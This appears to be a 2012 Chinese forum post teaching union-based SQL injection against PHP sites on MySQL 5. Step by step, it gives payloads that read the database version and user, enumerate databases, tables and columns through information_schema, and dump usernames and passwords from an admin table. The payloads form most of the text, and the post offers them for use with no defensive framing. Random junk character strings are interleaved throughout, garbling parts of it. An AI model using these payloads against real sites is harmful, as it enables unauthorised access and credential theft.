1 ~( w2 S8 L% R& n8 B' w2 w8 t教程内容:Mysql 5+php 注入' _' n6 G0 j2 T- q: }% `8 J
9 S3 [! q, ^* m0 p; q0 u; p
9 Z/ E4 x( b; w& a' [# o P. r, \- b; |9 P
一.查看MYSQL基本信息(库名,版本,用户)
% P) [$ i# W% k3 u, H, l
4 j* z% w4 u/ p+ b' V( Sand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
3 `% g' O6 n3 L& B: o \& ^
; h$ U6 |" X. N二.查数据库 M3 \' S D2 X3 G/ j
6 r1 Y. R% p$ A: v% q# K; [
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
/ I0 |7 T" _" ^& n; g; W9 I: Z5 A( klimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。- T, v9 {+ H; F$ a G# P' A" p; t
7 T6 n/ I1 m- U" \三.暴表
; r5 r% t2 B" C a- X
* {+ \) R. F" G! U6 U3 v* b( Fand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*: F; I- j" o" k6 [0 H; J/ X
$ [* C. H/ z/ E. v& Z( T C/ P( Blimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。) e9 I% L7 P# E' c3 S
4 j1 W6 K, d9 b- d
四.暴字段. a# ~4 ?2 O: ]6 d2 ~- Q
& E4 ]: k9 o# f4 u/ O
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*9 m$ J; [( |6 S6 i* u! `
, O1 b S# ^* P8 f
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
% }6 {' Z4 y# e4 [- p" _+ e, _0 `4 f5 X7 \
五.暴数据
$ F7 F% y1 k8 ^, w5 X
7 k8 E# [* z2 P% aand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*! d/ v4 t0 b# m. |: ^; P
5 b% r! U. n+ S( H1 Y8 e0 z( S
, b) z% ^+ M9 p3 p% d- w
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。! V. R' V9 A% h6 K9 e
|
发表于 2012-9-13 16:27:53
收藏
支持
反对